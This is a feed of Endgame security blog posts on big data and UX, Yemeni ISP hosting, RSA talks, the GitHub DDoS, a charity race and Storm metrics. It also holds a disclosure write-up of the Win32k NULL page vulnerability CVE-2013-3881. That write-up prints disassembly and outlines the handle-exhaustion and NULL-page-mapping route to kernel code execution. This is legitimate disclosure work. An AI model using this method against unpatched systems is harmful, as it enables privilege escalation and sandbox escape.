Channel: Endgame's Blog

Beyond the Buzz: Integrating Big Data & User Experience for Improved Cyber Security

UXBigDataBlogImage.jpg

by Andrea Little Limbago

Big Data and UX are much more than industry buzzwords; they are some of the most important solutions for making sense of the ever-increasing complexity and dynamism of the international system. While the big data analytics and user experience (UX) communities have made phenomenal technical and analytic breakthroughs, they remain stovepiped, often working at odds, and alone will never be silver bullets. Big data solutions aim to contextualize and forecast anything from disease outbreaks to the next Arab Spring. Conversely, the UX community points to the interface as the determinant battleground that will either make or break companies. This disconnect is especially prevalent in cyber security, and it is the users (and their respective companies) who suffer most. Users are either left with too much data but not the means within their skillset to explore it, or a beautiful interface that lacks the data or functionality they require. But the monumental advances in data science and UX together have the potential to instigate a paradigm shift in the security industry. These disparate worlds must be brought together to finally contextualize the threat and the risks, and make the vast range of security data much more accessible to a larger analytic and user base within an organization.

The Tech Battlegrounds

At a 2012 Strata conference, there was a pointed discussion on the importance of machine learning versus domain expertise. Not surprisingly, the panelists leaned in favor of machine learning, highlighting its many successes in forecasting across a variety of fields. The die was cast. Big data replaced the need for domain expertise and has become a booming industry, expanding from $3.2B in 2010 to $16.9B in 2015. For companies, the ability to effectively and efficiently sift through the data is essential. This is especially true in security, where the challenges of big data are even more pronounced given the need to expeditiously and persistently maintain situational awareness of all aspects of a network. Called anything from the sexiest job of the twenty-first century to a field whose demand is exploding, there is no shortage of articles highlighting the need for strong data scientists. More often than not, the spotlight is warranted. Depending on which source is referenced, over 90% of the world’s data has been created in the last two years, garnering big data superlatives such as total domination and the data deluge.

Clearly, there is a need to leverage everything from machine learning to applied statistics to natural language processing to help make sense of this data. However, most big data analysis tools – such as Hadoop, NoSQL, Hive, R or Python – are crafted for experienced data scientists. These tools are great for the experts, but are completely foreign to many. As has been well documented, the experts are few and far between, restricting full data exploration to the technical experts, no matter how quantitatively minded one might be. The user experience of these tools is not big data’s only problem. Without the proper understanding of the data and its constraints, data analytics can have numerous unintended consequences. For instance, had first responders focused on big data analyses of Twitter during Hurricane Sandy, they would have ignored the large swath of land without Internet access, where the help was most needed. In the education realm, universities are worried about profiling as a result of data analysis, even to the extreme of viewing big data as an intruder. Similarly, even with the most comprehensive data, policy responses require a combination of data-driven input, as well as contextual cultural, social, and economic trade-offs that correspond with various policy alternatives. As Erin Simpson notes, “The information revolution is too important to be left to engineers alone.” David Brooks summarized some of the shortcomings of big data, with an emphasis on bringing the necessary human element to big data analytics. Not only are algorithms required, but contextualization and domain expertise are also necessary conditions in this realm. This is especially true in cyber security, where some of the major breaches of the last few years occurred despite the targets actually possessing the data to identify a breach.

So how can companies turn big data to their advantage in a way that actually enables their current workforce to explore, access and discover within a big data environment? A new tech battleground has emerged, one for the customer interface. The UX community boasts its essential role in determining a tech company’s success and ability to bring services to users. Similar to the demand for data scientists, UX is one of the fastest growing fields, becoming “the most important leaders of the new business era…The success of companies in the Interface Layer will be designer-driven, and the greatest user experience (speed, design, etc.) will win.” The user-experience can either breed great product loyalty, or forever deter a user from a given product or service. From this perspective, technology is a secondary concern, driven by UX. The UX community prioritizes the essential role of humans over technologies, focusing on what the users experience and perceive. This is not just a matter of preferences and brand loyalty; it’s about the bottom line. By one measure, every $1 invested in UX yields a $2-$100 return.

In fact, the UX community increasingly emphasizes the essential role of UX in extracting insights from data. Until relatively recent advances in UX, the data and the technologies were both inaccessible to the majority of the population, driving them to spreadsheets and post-it notes to explore data. UX provides the translation layer between big data analytics technologies and users, enabling visually intuitive and functional access to data. UX democratizes access to big data, both the technologies driving big data analytics and the data itself. Unfortunately, the pendulum may have swung too far, with data perceived at best as “a supporting character in a story written by user experience” and at worst simply ignored. The interface layer alone is not sufficient for meeting the challenges of a modern data environment.

A Unified Approach

The data science and UX communities are innovating and modernizing in parallel silos. In some industries, such as cyber security, the two are unfortunately rarely considered together. Although necessary, neither is sufficient to meet the needs of the user community. Customers are not drawn to a given product for its interface, no matter how beautiful and elegant it might be. It has to solve a problem. Products such as Amazon, Uber and Spotify are so popular because of the data and data analytics underlying the services they provide. In each case, the product filled a niche or disrupted an inefficient process. That said, none of these would have caught on so quickly, or at all, without the modern UX that enabled fast, efficient and intuitive exploration of the data. Steve Jobs mastered this confluence of technology and the arts, noting, “technology alone is not enough. It’s technology married with liberal arts, married with humanities, that yields the results that make our hearts sing.”

It is this confluence of the arts and technology – the UX and the data science – that can truly revolutionize the security industry. The tech battlegrounds over machine learning and domain expertise or big data and UX are simply a waste of time. To borrow from Jerome Kagan, this is similar to asking whether a blizzard is caused by temperature or humidity – both are required. Together, sophisticated data science and modern, intuitive UX can truly innovate the security community. It is not a zero sum game, and the integration of the two is long overdue for security practitioners. The security threatscape is simply too dynamic, diverse and disparate to be tackled with a single approach. Moreover, the stakes are too high to continue limiting access to digital tools and data to only a select few personnel within a company. The smart integration of data science and the UX communities could very well be the long overdue paradigm shift the security community needs to truly distill the signal from the noise.

Graphic credit: Philip Jean-Pierre


See Your Company Through the Eyes of a Hacker: Turning the Map Around On Cybersecurity

Today, Harvard Business Review published “See Your Company Through the Eyes of a Hacker: Turning the Map Around On Cybersecurity” by Endgame CEO Nate Fick. In this piece, Nate argues that in order for enterprises to better defend themselves against the numerous advanced and pervasive threats that exist today, they must take a new approach. By looking at themselves through the eyes of their attackers—in the military, “turning the map around”—companies can get inside the mind of the adversary, see the situation as they do, and better prepare for what’s to come.

Nate identifies four ways that companies can “turn the map around” and better defend themselves against attackers. Read the full article at HBR.org

Sign up here for more News & Communications from Endgame.

Meet Nate and the Endgame team at RSA 2015. We’ll be in booth #2127 – register here for a free expo pass (use the registration code X5EENDGME) and stop by to learn more about Endgame.

Data-Driven Strategic Warnings: The Case of Yemeni ISPs

by Andrea Little Limbago

In 2007, a flurry of denial of service attacks targeted Estonian government websites as well as commercial sites, including banks. Many of these Russian-backed attacks were hosted on servers located in Russia. The following year, numerous high profile Georgian government and commercial sites were forced offline, redirected to servers in Moscow. Eventually, the Georgian government transferred key sites, such as the president’s site, to US servers. These examples illustrate the potential vulnerability of hosting sites on servers in adversarial countries. Both Estonia and Georgia are highly dependent on the Internet, with Estonia conducting virtually everything online from voting to finance. At the opposite end of the spectrum is Yemen, with twenty Internet users per 100 people. Would the same kind of vulnerability experienced by Georgian sites be a concern for a country with minimal Internet penetration?

For low and middle-income countries, traditional indicators of instability and dependencies – such as conflict measures or foreign aid, respectively – tend to drive risk assessments. When modern technologies are taken into account, most of this work focuses on the role of social media, as the majority of research on the Arab Spring and now ISIS reflects. While these technologies are important to include, they do not reflect the full spectrum of digitally focused insights that can be garnered for geopolitical analyses. More specifically, the hosting and/or transfer of strategic servers hosted in adversarial (or allied) sovereign territory could provide an oft-overlooked signal of a country’s intent. Eliminating this risk could be a subtle, but insightful, change that may warrant additional attention. The changing digital landscape could provide great value and potentially strategic warning of an altering geo-political landscape.

The Public Telecommunication Corporation (PTC) is the operator of Yemen’s major Internet service providers, Yemennet and TeleYemen. Using Endgame’s proprietary data, it is possible to analyze the changing digital landscape of all Internet-facing devices, including the digital footprint of the ISPs. The geo-enrichment and organizational information, when explored temporally, may shed light both on transitioning allegiances, as well as on who controls access to key digital instruments of power during conflict. These are state-affiliated ISPs, and in turn can be used for censorship and propaganda by those who control them, as exemplified in Eastern Europe. In fact, news broke on 26 March that Yemennet is blocking access to numerous websites opposed to Houthi groups. Houthis control the capital and have expanded their reach, leading to the recent air strikes by Saudi Arabia and Gulf Cooperation Council allies.

Looking at data from early 2011 to the present, it is apparent that the PTC, and Yemennet in particular, had a footprint mainly in Yemen but also in Saudi Arabia.

Figure1.PNG

PTC Cumulative Host Application Footprint 2011-2015

Figure2.PNG

Yemennet Cumulative Host Application footprint 2011-2015

However, the larger temporal horizon masks changes that occurred during these years. The maps below illustrate data over the last year, highlighting that the digital footprint has moved to entirely within Sana.

Figure3.PNG

PTC footprint 2014-15

Figure4.PNG

Yemennet Footprint March 2014-2015

An overview of the time series data shows a dramatic termination of a presence in Saudi Arabia during the summer of 2013.

Figure5.PNG

To ensure this breakpoint was not simply an elimination of the IP blocks located in Riyadh and Jeddah, but rather a move to Sana, I explored numerous IP addresses independently to assess the change. In each case, the actual hosting of the IP address transferred from Saudi Arabia to Yemen. Interestingly, just prior to the breakpoint in the data, an (allegedly) Iranian shipment of Chinese missiles, intended at the time for Houthi rebels in the northwestern part of the country, was located off the coast of Yemen. Moreover, the breakpoint also occurs within the same timeframe as the termination of Saudi Arabia’s aid to Yemen, which had been the bedrock of the relationship for decades. In fact, the elimination of this aid was described as giving “breathing space for it (Yemen) to become independent of its ‘big brother’ next door.” It is plausible that this transfer of domain host locations is similarly part of the larger desire for “breathing space”, or elimination of dependencies on its powerful neighbor.
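The check described above, separating a genuine move of hosts from a simple disappearance of IP blocks, can be sketched roughly as follows. This is a minimal illustration on synthetic observations, not Endgame's proprietary data or method: the record layout `(period, ip, country)`, the function names, and the documentation-range IP addresses are all assumptions made for the example.

```python
from collections import defaultdict

# Synthetic, illustrative observations: (period, ip, hosting country).
# These are NOT real measurements; 192.0.2.0/24 is a documentation range.
OBSERVATIONS = [
    ("2013-Q1", "192.0.2.10", "SA"),
    ("2013-Q1", "192.0.2.11", "SA"),
    ("2013-Q1", "192.0.2.12", "YE"),
    ("2013-Q2", "192.0.2.10", "SA"),
    ("2013-Q2", "192.0.2.11", "SA"),
    ("2013-Q2", "192.0.2.12", "YE"),
    ("2013-Q3", "192.0.2.10", "YE"),
    ("2013-Q3", "192.0.2.11", "YE"),
    ("2013-Q3", "192.0.2.12", "YE"),
    ("2013-Q4", "192.0.2.10", "YE"),
    ("2013-Q4", "192.0.2.12", "YE"),
]


def country_share_by_period(observations, country):
    """Fraction of observed hosts located in `country`, per period."""
    totals = defaultdict(int)
    hits = defaultdict(int)
    for period, _ip, host_country in observations:
        totals[period] += 1
        if host_country == country:
            hits[period] += 1
    return {p: hits[p] / totals[p] for p in sorted(totals)}


def find_breakpoint(shares):
    """First period from which the share stays at zero after being non-zero."""
    periods = list(shares)
    for i in range(1, len(periods)):
        was_present = shares[periods[i - 1]] > 0
        gone_for_good = all(shares[q] == 0 for q in periods[i:])
        if was_present and gone_for_good:
            return periods[i]
    return None


def classify_ips(observations, old_country, new_country):
    """Label each IP as moved, vanished, or unchanged relative to old_country."""
    history = defaultdict(list)
    for _period, ip, host_country in sorted(observations):
        history[ip].append(host_country)
    labels = {}
    for ip, countries in history.items():
        if old_country not in countries:
            labels[ip] = "unchanged"
        elif countries[-1] == new_country:
            labels[ip] = "moved"
        else:
            labels[ip] = "vanished"
    return labels


shares = country_share_by_period(OBSERVATIONS, "SA")
print(find_breakpoint(shares))
print(classify_ips(OBSERVATIONS, "SA", "YE"))
```

An address labeled "moved" was first seen hosted in the old country and last seen in the new one, which is the pattern the paragraph reports; "vanished" would instead point to the IP blocks simply being eliminated.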

Does this transfer of the main Yemeni ISPs away from Saudi Arabia to entirely within Yemen’s borders indicate a strategic change? As is the case with all strategic warnings, they should be validated with additional research. Nevertheless, data-driven strategic warnings are few and far between in the realm of international relations. Even the smallest proactive insight into potential changes in the geo-political landscape could help highlight and focus attention on areas previously overlooked. Despite the presence of al-Qaeda in the Arabian Peninsula (AQAP), Yemen has not garnered much attention outside of the counter-terrorism domain. But as we’re seeing now, Yemen could very well be the battleground for a proxy conflict between the dominant actors in the Middle East. Perhaps an exploration of Yemen’s digital landscape during 2013 could have prompted a more holistic and proactive analysis of the changing regional dynamics. The digital landscape of key organizations may offer enough strategic insight to enable proactive research into regions that are on the verge of major tectonic geopolitical shifts. With the onset of the cyber domain as a major battleground for power politics, digital data must not only be integrated into tactical analyses, but can also help inform strategic warning.

Meet Endgame at RSA 2015

Endgame will be at RSA 2015!

Stop by the South Hall, Booth #2127 to:

  • Get a product demo. Learn more about how we help customers instantly detect and actively respond to adversaries.

  • Learn from our experts. We’ll present three technical talks at our booth throughout the week. No registration required - just show up!

RSATalkCalendar2.jpg

Don’t have an expo pass? Register here for a free expo pass courtesy of Endgame (use the registration code X5EENDGME).

Technical Talk Descriptions

Vulnerability and Exploit Trends: Using Behavioral Analysis and Operating System Defenses to Prevent Advanced Threats
Speaker: Cody Pierce, Endgame Director of Vulnerability Research

Despite the best efforts of the security community—and big claims from security vendors—large areas of vulnerabilities and exploits remain to be leveraged by adversaries. Attendees will learn about:

  • A new perspective on the current state of software flaws.
  • The wide margin between disclosed vulnerabilities and public exploits including a historical analysis and trending patterns.
  • Effective countermeasures that can be deployed to detect, and prevent, the exploitation of vulnerabilities.
  • The limitations of Operating System provided mitigations, and how a combination of increased countermeasures with behavioral analysis will get defenders closer to preventing the largest number of threats.

Cody Pierce has been involved in computer and network security since the mid 90s. For the past 13 years he has focused on discovery and remediation of known and unknown vulnerabilities. Instrumental in the success of HP’s Zero Day Initiative program, Cody has been exposed to hundreds of 0day vulnerabilities, advanced threats, and the most current malware research. At Endgame, Cody has led a successful team tasked with analyzing complex software to identify unknown vulnerabilities and leveraged global situational awareness to manage customer risk.

Sensornet™ Attack Patterns and What They Mean for Defenders
Speaker: Curt Barnard, Endgame Software Implementation Engineer

The Internet is flooded with traffic from web crawlers, port scanners, and brute force attacks. Data analyzed from Sensornet™, a unique network of sensors, allows us to observe trends on the Internet at large. Attendees will learn:

  • How to identify if malicious traffic directed at your network service is part of a larger CNO campaign.
  • How to get advanced warning of new attacks and malware seen in the wild but not yet reported on.
  • How network defenders can better protect themselves against attacks that occur at scale.
  • How Endgame identifies malicious hosts that are attempting to leverage exploits such as the Shellshock vulnerability at scale.

Curt Barnard is a network security professional with six years of experience. While attending the Air Force Institute of Technology, he conducted research on advanced methods of covert data exfiltration, steganography, and digital forensics. As a Department of Defense employee, Curt focused on analysis and operations to counter some of the most advanced cyber threats. At Endgame, Curt continues this research, coaxing malicious actors into revealing their TTPs and creating defensive measures based on real-time threat data.

Using Data Science to Solve Security Problems
Speaker: Phil Roth, Endgame Data Scientist

Data science techniques can help organizations solve their security problems — but they aren’t a silver bullet. Working directly with customers, Endgame has been able to match the right science to unsolved customer security challenges to create effective solutions. In this talk, attendees will experience a small part of that process by learning:

  • How machine learning techniques can be used to find security insights in large amounts of data.
  • The difference between supervised and unsupervised learning and the different types of security problems they can solve.
  • How a lack of labeled data and the high cost of misclassifications present challenges to data scientists in the security industry.
  • How Endgame has used an unsupervised clustering technique to group cloud-based infrastructure, a fundamental step in the detection of malicious behavior.

Phil Roth cleans, organizes, and builds models around security data for Endgame. He learned those skills in academia while earning his physics PhD at the University of Maryland. It was there that he built data acquisition systems and machine learning algorithms for a large neutrino telescope called IceCube based at the South Pole. He has also built image processors for air and space based radar systems.

Git Hubris? The Long-Term Implications of China’s Latest Censorship Campaign

GitHubBlogGraphic.jpg

by Andrea Little Limbago

Last Friday, GitHub, the popular collaborative site for developers, experienced a series of distributed denial of service (DDoS) attacks. The attacks are the largest in the company’s history, and continued through Tuesday before fully coming under control. GitHub has not been immune to these kinds of attacks in the past, and is quite experienced at maintaining or restoring the site during the onslaught. GitHub experienced a series of DDoS attacks in both 2012 and 2013, and similar attacks earlier in March. By all independent accounts, the Cyberspace Administration of China (CAC) is behind this latest wave of attacks, redirecting traffic from the Chinese search engine, Baidu, to overwhelm GitHub. While the malicious activity bears the fingerprints of a Chinese campaign, its authors may have awoken a sleeping giant in the open source development community. Unlike the latest high profile attacks – such as Sony and Anthem – these attacks visibly disrupted the day-to-day life of a tight knit, transnational and largely middle-class social network. And it is these kinds of transnational networks that, when unified, spawn social movements.

This week’s attack focused on pressuring GitHub to remove content related to GreatFire.org and another site that hosts links to the Chinese version of The New York Times. Both of these are platforms for circumventing the Great Firewall, and the campaign is therefore a direct attack both on free speech and on the tech community. In the past, China has restored access to GitHub due to criticism from the domestic developer community. However, China has been tightening censorship over the last few years, which has instigated the creation of groups like Great Fire to work with external partners – such as Reporters without Borders – to help fight Chinese censorship. With over 300 cofounders, Great Fire is gaining traction and has tightened relations with the major media outlets outside of China. It is these kinds of transnational activist networks that have proven so successful in the past. Written well before the rise of social media, Margaret Keck and Kathryn Sikkink’s Activists Beyond Borders introduced the concept of the boomerang effect. The boomerang effect occurs when a state is unresponsive to the demands of domestic groups, who then form transnational alliances to amplify the demands of the groups and readdress the demands via international pressure. To date, Great Fire is pursuing a similar trajectory to previous successful social movements.

Is it possible that the latest wave of DDoS attacks is enough to fully solidify the relationship of groups like Great Fire not only with journalists, but also with the open source development community? A brief review of Twitter content (similar to the screenshots below) pertaining to the GitHub DDoS attacks produces three general themes: 1) who is doing this?; 2) why are they doing this?; 3) stop messing with my project. In fact, one popular source for open source news asks, “Who on Earth would attack GitHub?” The open source community is clearly one of the largest proponents of free speech and collaboration; it has been very vocal on issues of privacy, but relatively silent on global events. Nevertheless, couple that intrinsic and core set of beliefs with disruption to their own projects, and the conditions are created under which social movements begin to coalesce. More recent literature on social movements further highlights the greater success of the movements when pursuing non-violent means to instigate change.

The latest executive order sanctions those associated with cyber attacks, but it is more so reactive than proactive. The open source community could build upon lessons learned from the GitHub experience, and collaborate with colleagues throughout the tech community to inflict economic damage on those who are directly attacking open source development. For instance, a de facto embargo on certain technologies to China is much more politically feasible and costly than working through the ITAR process. While the tipping point for awareness has not yet been reached – one indication of which is the lack of prominent mainstream media on the GitHub breach – the conditions are ripe for the start of a transnational social movement, driven by the open source development community if it coalesces around this cause (similar to that which occurred over privacy concerns) instead of allowing it to silently dissipate.

githubgraphic.jpg

In contrast, China likely sees this latest GitHub campaign as simply an extension of previous breaches, which failed to garner any political blowback, but aided their larger censorship efforts. However, China will increasingly have to deal with the growing paradox of promoting censorship as well as technical development. This is one of the many contradictions China continues to encounter as it simultaneously modernizes its economy and pursues global ambitions. The choice of Baidu, for instance, potentially reveals another rift in China’s approach to development. Robin Li, the CEO of Baidu, is the third wealthiest man in China and a member of the government’s top political advisory council. This makes the choice of Baidu potentially confrontational, as it is publicly traded and not part of the state-owned enterprises that tend to operate at the behest of the government. So far, Baidu has denied any connection to the GitHub attacks. Contradictions like these are increasingly surfacing as corruption campaigns, censorship and extension of power dominate Chinese politics.

The latest GitHub attack, the largest in its history, remains off the radar for all but those in the larger technology and open source communities. This is unfortunate, as it has the potential to have much broader long term implications within China than any of the other Chinese-associated attacks in the last year. It will be interesting to watch whether the open source community will use this as a springboard for global advocacy for free speech with the potential to inflict economic and technological pain. The current response has been lukewarm at best, but the conditions are ripe for change. China might do well to heed the advice of Barrington Moore, who over a half century ago wrote about the preconditions for social movements toward democracy and dictatorships. He notes that the tipping point of change tends to occur when the daily routines of the middle class are disrupted or threatened with destruction. China has crossed this threshold, and very well may be uniting the transnational network on which movements are made.

Endgame Participates in Tough Mudder Benefitting Wounded Warrior Project

On April 20, over thirty Endgame employees, family members and friends participated in the Mid-Atlantic Spring 2013 Tough Mudder, supporting the Wounded Warrior Project. Funds raised for the Wounded Warrior Project go towards providing combat stress recovery programs, adaptive sports programs, benefits counseling, employment services and many other critical programs. Endgame is proud to support this important organization and give back to the thousands of Americans returning from the battlefield.

Microsoft Win32k NULL Page Vulnerability Technical Analysis

Overview

Endgame has discovered and disclosed to Microsoft the Win32k NULL Page Vulnerability (CVE-2013-3881), which has been fixed in Microsoft’s October Security Bulletin, released October 8, 2013. The vulnerability was the result of insufficient pointer validation in a kernel function that handles popup menus. Successfully exploiting this vulnerability would allow an attacker with unprivileged access to a Windows 7 or Server 2008 R2 system to gain access to the Windows kernel, thereby rendering user account controls useless.

Affected Versions

In previous versions of Windows, including XP, Server 2003, Vista, and Server 2008 R1, Microsoft actually included code that adequately verified the pointer in question. However, in Windows 7 (and Server 2008 R2), that check was removed, leading to the exploitable condition.

If the product line ended there, it would be easy to imagine that this was an inadvertent removal of what a developer mistakenly thought was a redundant check and to give it little additional thought. However, in the initial release of Windows 8 (August 2012), the pointer validation had been put back in place, long before we reported the bug to Microsoft. We would assume that when a significant security issue comes to light, Microsoft would simultaneously fix it across all affected products. Unless the Windows 8 win32k.sys code was forked from a pre-Windows 7 base, this bug was fixed upstream by Microsoft prior to our disclosure. This is purely speculative, but if our previous supposition is true, they either inadvertently fixed the bug, or recognized the bug and purposely fixed it, but failed to understand the security problem it created.

Mitigation

The good news for Windows users is that Microsoft does have a realistic approach to dealing with vulnerabilities, which resulted in some protection even prior to the release of this patch. One of the simplest security features (at least in concept, if not in implementation) that Microsoft introduced in Windows 8 was to prohibit user applications from mapping memory at virtual address zero. This technique takes the entire class of null-pointer-dereference kernel bugs out of the potential-system-compromise category and moves them into the relatively benign category of user-experience/denial-of-service problems. When Microsoft back-ported this protection to Windows 7, they eliminated the opportunity to exploit this bug on 64-bit systems. This illustrates how the conventional wisdom that “an ounce of prevention is worth a pound of cure” can be turned on its ear in the world of software vulnerabilities. Microsoft will undoubtedly be fixing null pointer dereferences in their products for as long as they support them. However, by applying a relatively inexpensive “cure”, they have limited the consequences of the problems that they will spend years trying to “prevent”.

Impact

Part of what makes this type of vulnerability so valuable to attackers is the proliferation of sandbox technologies in popular client-side applications. We have confirmed that this vulnerability can be exploited from within several client-side applications’ sandboxes, including Google Chrome and Adobe Reader, and from Internet Explorer’s protected mode. On the surface, that sounds like bad news. On the other hand, we would not have even considered that question if these mitigation technologies were not making it more difficult for attackers to compromise systems. In order to completely own a target via one of those applications, an attacker must have a vulnerability that leads to code execution, another that allows them to leak memory so as to defeat Microsoft’s memory randomization feature, and finally, a vulnerability like the one described here that allows them to escape the hobbled process belonging to the initial target application.

Technical Details

When an application displays a popup or context menu, it must call user32!TrackPopupMenu or user32!TrackPopupMenuEx in order to capture the action that the user takes relative to that menu. This function eventually leads to the xxxTrackPopupMenuEx function in win32k.sys. Since it is unusual to simultaneously display multiple context menus, there is a global MenuState object within win32k.sys that is ordinarily used to track the menu. However, since it is possible to display multiple context menus, if the global MenuState object is in use, xxxTrackPopupMenuEx attempts to create another MenuState object with a call to xxxMNAllocMenuState. xxxTrackPopupMenuEx saves the result of this allocation attempt and checks to ensure that the result was not 0, as seen in the most recent unpatched 64-bit Windows 7 version of win32k.sys (6.1.7601.18233):

xxxTrackPopupMenuEx+364 call  xxxMNAllocMenuState
xxxTrackPopupMenuEx+369 mov   r15, rax
xxxTrackPopupMenuEx+36C test  rax, rax
xxxTrackPopupMenuEx+36F jnz   short alloc_success
xxxTrackPopupMenuEx+371 bts   esi, 7
xxxTrackPopupMenuEx+375 jmp   clean_up

In the event that the allocation fails, the function skips to its cleanup routine, which under normal circumstances will cause a BSOD when the function attempts to dereference unallocated memory at r15+8:

xxxTrackPopupMenuEx+9BA clean_up:   ; CODE XREF: xxxTrackPopupMenuEx+375j
xxxTrackPopupMenuEx+9BA bt    dword ptr [r15+8], 8

However, if we can allocate and correctly initialize the memory mapped at address zero for the process, we can reliably gain arbitrary code execution when the function passes the invalid MenuState pointer to xxxMNEndMenuState.

xxxTrackPopupMenuEx+A76 mov rcx, r15 ;pMenuState
xxxTrackPopupMenuEx+A79 call  xxxMNEndMenuState

It is possible to reliably create circumstances in which the xxxTrackPopupMenuEx call to xxxMNAllocMenuState will fail. After creating two windows, we use repeated calls to NtGdiCreateClientObj in order to reach the maximum number of handles that the process is allowed to have open. Once we have exhausted the available handles, we attempt to display a popup menu in each of the two previously created windows. Since the global MenuState object is not available for the second window’s menu, xxxTrackPopupMenuEx calls xxxMNAllocMenuState in order to create a new MenuState object. Because there are no available handles due to our previous exhaustion, this call fails and xxxMNEndMenuState is called with a parameter of 0, instead of a valid pointer to a MenuState object.

 

Storm Metrics How-To


If you have been following Storm’s updates over the past year, you may have noticed the metrics framework feature, added in version 0.9.0 (see the “New Storm metrics system” PR). It provides nicer primitives, built into Storm, for collecting application-specific metrics and reporting those metrics to external systems in a manageable and scalable way.

This blog post is a brief how-to on using this system, since the only examples of it I’ve seen are in the core Storm code.

Concepts

Storm’s metrics framework mainly consists of two API additions: 1) Metrics, 2) Metrics Consumers.

Metric

An object initialized in a Storm bolt or spout (or Trident Function) that is used for instrumenting the respective bolt/spout for metric collection. This object must also be registered with Storm using the TopologyContext.registerMetric(…) function. Metrics must implement backtype.storm.metric.api.IMetric. Several useful Metric implementations exist. (Excerpt from the Storm Metrics wiki page with some extra notes added).

AssignableMetric — set the metric to the explicit value you supply. Useful if it’s an external value or in the case that you are already calculating the summary statistic yourself. Note: Useful for statsd Gauges.

CombinedMetric — generic interface for metrics that can be updated associatively.

CountMetric — a running total of the supplied values. Call incr() to increment by one, incrBy(n) to add/subtract the given number. Note: Useful for statsd counters.

MultiCountMetric — a hashmap of count metrics. Note: Useful for many Counters where you may not know the name of the metric a priori or where creating many Counters manually is burdensome.

MeanReducer — an implementation of ReducedMetric that tracks a running average of values given to its reduce() method. (It accepts Double, Integer or Long values, and maintains the internal average as a Double.) Despite his reputation, the MeanReducer is actually a pretty nice guy in person.
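To make the report-and-reset behaviour of these metric types concrete, here is a small sketch. It is written in Python rather than Java and is only loosely modeled on the descriptions above; the class and method names are hypothetical stand-ins, not Storm's API. The one thing it borrows from Storm is the idea that a metric hands back its current value and starts over once per time bucket.

```python
from collections import defaultdict


class CountMetric:
    """Running total that is reported and reset once per time bucket."""

    def __init__(self):
        self._value = 0

    def incr(self):
        self._value += 1

    def incr_by(self, n):
        self._value += n

    def get_value_and_reset(self):
        value, self._value = self._value, 0
        return value


class MultiCountMetric:
    """A map of named counters, created lazily by scope(name)."""

    def __init__(self):
        self._counters = defaultdict(CountMetric)

    def scope(self, name):
        return self._counters[name]

    def get_value_and_reset(self):
        return {name: c.get_value_and_reset() for name, c in self._counters.items()}


class MeanMetric:
    """Running average of the values seen in the current bucket."""

    def __init__(self):
        self._sum = 0.0
        self._count = 0

    def update(self, value):
        self._sum += value
        self._count += 1

    def get_value_and_reset(self):
        mean = self._sum / self._count if self._count else None
        self._sum, self._count = 0.0, 0
        return mean
```

Each call to get_value_and_reset() plays the role of one time bucket ending: the value goes to the consumer and the metric starts from scratch.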

Metrics Consumer

An object meant to process/report/log/etc output from Metric objects (represented as DataPoint objects) for all the various places these Metric objects were registered, also providing useful metadata about where the metric was collected such as worker host, worker port, componentID (bolt/spout name), taskID, timestamp, and updateInterval (all represented as TaskInfo objects). MetricConsumers are registered in the Storm topology configuration (using backtype.storm.Config.registerMetricsConsumer(…)) or in Storm’s system config (under the config name topology.metrics.consumer.register). Metrics Consumers must implement backtype.storm.metric.api.IMetricsConsumer.

Example Usage

To demonstrate how to use the new metrics framework, I will walk through some changes I made to the ExclamationTopology included in storm-starter. These changes will allow us to collect some metrics including:

  1. A simple count of how many times the execute() method was called per time period (5 sec in this example).
  2. A count of how many times an individual word was encountered per time period (1 minute in this example).
  3. The mean length of all words encountered per time period (1 minute in this example).

Adding Metrics to the ExclamationBolt

Add three new member variables to ExclamationBolt. Notice they are all declared as transient. This is needed because none of these Metrics are Serializable and all non-transient variables in Storm bolts and spouts must be Serializable.

transient CountMetric _countMetric;
transient MultiCountMetric _wordCountMetric;
transient ReducedMetric _wordLengthMeanMetric;

Initialize and register these Metrics in the Bolt’s prepare method. Metrics can only be registered in the prepare method of bolts or the open method of spouts; otherwise an exception is thrown. The registerMetric method takes three arguments: 1) metric name, 2) metric object, and 3) time bucket size in seconds. The “time bucket size in seconds” controls how often the metrics are sent to the Metrics Consumer.

@Override
public void prepare(Map conf, TopologyContext context, OutputCollector collector) {
  _collector = collector;
  initMetrics(context);
}

void initMetrics(TopologyContext context) {
  _countMetric = new CountMetric();
  _wordCountMetric = new MultiCountMetric();
  _wordLengthMeanMetric = new ReducedMetric(new MeanReducer());

  context.registerMetric("execute_count", _countMetric, 5);
  context.registerMetric("word_count", _wordCountMetric, 60);
  context.registerMetric("word_length", _wordLengthMeanMetric, 60);
}

Actually increment/update the metrics in the bolt’s execute method. In this example we are just:

  1. incrementing a counter every time we handle a word.
  2. incrementing a counter for each specific word encountered.
  3. updating the mean length of the words we encountered.

@Override
public void execute(Tuple tuple) {
  _collector.emit(tuple, new Values(tuple.getString(0) + "!!!"));
  _collector.ack(tuple);
  updateMetrics(tuple.getString(0));
}

void updateMetrics(String word) {
  _countMetric.incr();
  _wordCountMetric.scope(word).incr();
  _wordLengthMeanMetric.update(word.length());
}



 

Collecting/Reporting Metrics

Lastly, we need to enable a Metric Consumer in order to collect and process these metrics. The Metric Consumer is meant to be the interface between the Storm metrics framework and some external system (such as Statsd, Riemann, etc). In this example, we are just going to log the metrics using Storm’s built-in LoggingMetricsConsumer. This is accomplished by registering the Metrics Consumer when defining the Storm topology. In this example, we are registering the metrics consumer with a parallelism hint of 2. Here is the line we need to add when defining the topology.

conf.registerMetricsConsumer(LoggingMetricsConsumer.class, 2);

Here is the full code for defining the topology:

TopologyBuilder builder = new TopologyBuilder();
builder.setSpout("word", new TestWordSpout(), 10);
builder.setBolt("exclaim1", new ExclamationBolt(), 3).shuffleGrouping("word");
builder.setBolt("exclaim2", new ExclamationBolt(), 2).shuffleGrouping("exclaim1");

Config conf = new Config();
conf.setDebug(true);
conf.registerMetricsConsumer(LoggingMetricsConsumer.class, 2);

if (args != null && args.length > 0) {
  conf.setNumWorkers(3);
  StormSubmitter.submitTopology(args[0], conf, builder.createTopology());
}
else {
  LocalCluster cluster = new LocalCluster();
  cluster.submitTopology("test", conf, builder.createTopology());
  Utils.sleep(5 * 60 * 1000L);
  cluster.killTopology("test");
  cluster.shutdown();
}

After running this topology, you should see log entries in $STORM_HOME/logs/metrics.log that look like this.

2014-01-05 09:25:34,809 5479318 1388931931 localhost:6702  9:exclaim2 execute_count 196
2014-01-05 09:25:49,806 5494315 1388931949 localhost:6703  8:exclaim1 execute_count 28
2014-01-05 09:25:59,812 5504321 1388931959 localhost:6703  8:exclaim1 execute_count 34
2014-01-05 09:25:59,812 5504321 1388931946 localhost:6702  6:exclaim1 execute_count 29
